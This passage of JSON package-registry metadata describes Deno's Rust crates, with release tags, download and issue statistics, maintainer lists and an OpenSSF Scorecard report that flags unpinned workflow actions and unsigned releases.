1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T02:55:30.496Z","dependent_packages_count":15,"downloads":773598,"downloads_period":"total","dependent_repos_count":30,"rankings":{"downloads":4.950065781605071,"dependent_repos_count":5.161531558480407,"dependent_packages_count":2.628430419501982,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":0.9807439301518956,"average":2.296766365480041},"purl":"pkg:cargo/deno_tls","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_tls","docker_dependents_count":19,"docker_downloads_count":18696296,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_tls","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_tls/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T03:03:41.777Z","issues_count":6626,"pull_requests_count":9646,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1532231.9017556966,"issues_closed_count":3798,"pull_requests_closed_count":8030,"pull_request_authors_count":580,"issue_authors_count":2473,"avg_comments_per_issue":2.50814971325083,"avg_comments_per_pull_request":0.7193655401202571,"merged_pull_requests_count":7012,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":666,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1323857.4606060607,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":660,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.2477477477477477,"past_year_avg_comments_per_pull_request":1.1131447587354408,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_tls/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:35.146Z","updated_at":"2022-11-07T18:29:35.146Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.865Z","updated_at":"2023-07-18T22:41:28.865Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":10786760,"name":"deno_package_json","ecosystem":"cargo","description":"package.json implementation for the Deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":67,"first_release_published_at":"2024-07-23T15:19:28.991Z","latest_release_published_at":"2026-08-06T11:33:18.786Z","latest_release_number":"0.59.0","last_synced_at":"2026-08-29T21:57:05.182Z","created_at":"2024-08-06T05:58:15.401Z","updated_at":"2026-08-29T21:57:05.183Z","registry_url":"https://crates.io/crates/deno_package_json/","install_command":"cargo install deno_package_json","documentation_url":"https://docs.rs/deno_package_json/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction 